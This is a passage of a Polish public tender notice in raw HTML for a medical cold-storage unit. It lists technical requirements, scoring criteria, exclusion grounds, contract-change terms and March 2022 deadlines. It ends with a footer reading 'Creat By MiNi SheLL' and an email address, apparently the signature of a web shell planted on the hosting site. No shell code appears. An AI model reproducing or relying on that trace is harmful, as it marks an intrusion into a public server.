osiągnięciu maksymalnego progu zużycia wstępnie ustawiony alarm ma sugerować wymianę podzespołu dla zmniejszenia awarii i przestoju urządzenia.<br/>25.	Powinna istnieć możliwość aktualizacji oprogramowania sterownika chłodni poprzez port USB.<br/>26.	W panel sterownia powinien być wbudowany cyfrowy rejestrator danych umożliwiający elektroniczne rejestrowanie wszelkich zdarzeń takich jak: stany alarmowe, temperatura wewnętrzna, temperatura otroczenia, otwarcie drzwi oraz napięcie zasilające z odczytem na graficznym wyświetlaczu LCD.<br/>27.	Chłodnia powinna być wyposażona w system alarmowania (wszystkie rodzaje stanów alarmowych muszą być wyświetlane na panelu sterownia w postaci komunikatów tekstowych w celu ułatwienia szybkiej diagnozy):<br/>	Wysoka lub niska temperatura (regulowane ustawienie),<br/>	Przedłużone otwarcie drzwi,<br/>	Brak zasilania lub napięcie poza zakresem,<br/>	Awaria sprężarki,<br/>	Błąd przekaźnika,<br/>	Rozładowanie baterii podtrzymującej prace sterownika,<br/>	Uszkodzeniu lub błąd sondy temperatury,<br/>	Brudny skraplacz,<br/>	Napięcie sieciowe poza dopuszczalnym zakresem,<br/>28.	Funkcja identyfikacji alarmów oraz poprawności pracy za pomocą kolorów (zielony, pomarańczowy, czerwony) – oznaczenie kolorami wyświetlanych parametrów pracy.<br/>29.	Chłodnia powinna być wyposażona w system wewnętrznej wentylacji gwarantujący równomierny rozkład temperatury we wnętrzu urządzenia.<br/>30.	Zasilanie: 230V/50Hz.<br/>31.	Chłodnia powinna być wyposażona w baterię/akumulator, która jest stale monitorowana pod kątem poziomu naładowania. W przypadku awarii zasilania, bateria musi gwarantować min. 36 godzinne podtrzymanie pracy sterownika i systemów alarmowych.<br/>32.	Możliwość przeglądani funkcji na panelu sterowani za pomocą ideogramów.<br/>33.	Dostawca zapewni gwarancję na urządzenie na okres minimum 24 miesięcy.<br/>34.	Dostawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez Zamawiającego.<br/>35.	Dostawca zapewnia autoryzowany serwis na terenie Polski. Serwisanci powinni posiadać odpowiednie kwalifikacje do przeprowadzania czynności serwisowych – potwierdzone stosownymi zaświadczeniami.<br/>36.	Czas naprawy do 48 godzin od momentu zgłoszenia awarii. Zgłoszenie może odbyć się telefonicznie lub mailowo (zgodnie z danymi kontaktowymi podanymi w umowie na sprzedaż urządzenia).<br/>37. Dostawca zapewnia minimum 24 miesięczną gwarancję na urządzenie od daty instalacji.<br/>38.	Dostawca zapewni szkolenie personelu z zakresu obsługi urządzenia w języku polskim.<br/>39.	Czas dostawy urządzenia od daty podpisania umowy – maksymalnie 12 tygodni.<br/>40.	Wraz z dostarczonym urządzeniem Dostawca dostarczy odpowiednie dokumenty tj. certyfikat potwierdzający zgodności urządzeni z Dyrektywą 93/42/EEC lub równoważną; Instrukcja obsługi w języku polskim, protokół zdawczo – odbiorczy, protokół szkolenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42513000-5 - Urządzenia chłodnicze i mrożące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">20.1.1	Cena oferty brutto - 60 %<br/><br/>Punkty w niniejszym kryterium zostaną przyznane wg następującego wzoru:<br/><br/>Najniższa oferowana cena brutto spośród ofert nie podlegającej odrzuceniu<br/> -------------------------------------------------------- x 60<br/> Cena brutto oferty badanej<br/><br/><br/><br/>20.1.2	Kryterium jakość - 40 %<br/><br/>Punkty w niniejszym kryterium zostaną przyznane wg następującej punktacji<br/> Suma punktów dla danej oceny zostanie podstawiona do poniższego wzoru<br/>Parametry jakościowe = Suma punktów oferty badanej <br/>Maksymalna liczba punktów 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.1.1	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>8.1.2	Oświadczenie wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, w celu wykazania braku podstaw do wykluczenia w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Deklaracje zgodności dla przedmiotu zamówienia (w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem) - potwierdzającą oznakowanie wyrobów znakiem CE lub dokument równoważny.<br/> Specyfikacja techniczna urządzeń (np. karta katalogowa producenta urządzenia) potwierdzająca oferowane parametry z OPZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje jednokrotne wezwanie do uzupełnienia przedmiotowych środków dowodowych gdy nie zostaną złożone, zostaną złożone nieprawidłowe lub zawierające błędy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.14	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wyboru oferty wykonawców, wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są do złożenia, przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany umowy dokonuje się w formie pisemnej pod rygorem nieważności, z tym że zgodnie z art. 455 ustawy Prawo zamówień publicznych istotna zmiana postanowień zawartej umowy może nastąpić jedynie w sytuacji obiektywnej konieczności wprowadzenia zmiany w niżej podanym zakresie<br/>a.	w części dotyczącej wysokości wynagrodzenia brutto, która będzie wynikać ze zmiany w prawie właściwym dla podatku od towarów i usług VAT - w razie zmiany stawki podatku VAT po zawarciu niniejszej umowy, strony obowiązywać będzie nowa stawka podatku z datą wprowadzenia jej w życie przepisami, a zmiana kwoty brutto wartości umowy z tego tytułu jest akceptowana przez strony bez konieczności składania dodatkowych oświadczeń i zmiany umowy.b.w części dotyczącej danych podmiotowych Wykonawcy (np.: zmiana siedziby, adresu i nazwy podmiotu wykonującego przedmiotową dostawę) w związku z wewnętrzną reorganizacją w ramach prowadzonej działalności lub wynikająca z przekształcenia podmiotowego po stronie wykonawcy w formie sukcesji uniwersalnej.c.zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot i warunki umowy oraz zmiana sytuacji prawnej lub faktycznej Wykonawcy i/lub Zamawiającego skutkująca niemożliwością realizacji przedmiotu zamówienia; <br/>d.	powstania nadzwyczajnych okoliczności (nie będących „siła wyższą”), grożących rażącą stratą, których strony nie przewidziały przy zawarciu umowy; e.zmiany wynikające z powstania niezgodności pomiędzy zapisami umowy a treścią oferty i/lub SWZ.2.Wyżej wymienione zmiany z zastrzeżeniem, o którym mowa w ust. 1 lit. a. mogą być dokonane na wniosek Zamawiającego lub Wykonawcy, za zgodą obu stron i zostaną wprowadzone do umowy aneksem.3.Zamawiający przewiduje także możliwość wprowadzenia zmiany wysokości wynagrodzenia Wykonawcy z tytułu realizacji Umowy, w przypadku:a.zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, b.zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,c.zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych <br/>(t. j. Dz.U. z 2020 r., poz. 1342, z pón. zm.),4.Warunkiem wprowadzenia zmiany wynagrodzenia na skutek okoliczności wskazanych w ustępie poprzedzającym, jest przedłożenie przez Wykonawcę Zamawiającemu pisemnego wniosku w tym przedmiocie, zawierającego co najmniej:<br/>a.wskazanie przepisów, które uległy zmianie (z określeniem daty wejścia w życie zmian) oraz szczegółowe uzasadnienie wpływu tych zmian na koszty wykonania zamówienia, i dokładne określenie wysokości zmiany tych kosztów;b.określenie wysokości nowego wynagrodzenia wraz z przedstawieniem szczegółowej kalkulacji kwoty, o jaką wynagrodzenie ma ulec zmianie;c.wskazanie daty, od której nastąpi bądź nastąpiła zmiana kosztów realizacji przedmiotu umowy (nie wcześniejszej niż data wejścia w życie właściwych przepisów).5.Jeżeli z wnioskiem o dokonanie zmiany wysokości wynagrodzenia, o której mowa w ust. 3. występuje Wykonawca, zobowiązany jest on załączyć do wniosku, dokumenty uzasadniające zmianę kosztów wykonania zamówienia oraz wysokość tej zmiany <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.3.	Adres strony internetowej prowadzonego postępowania oraz strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia (Platforma): https://rckik-radom.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-15 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com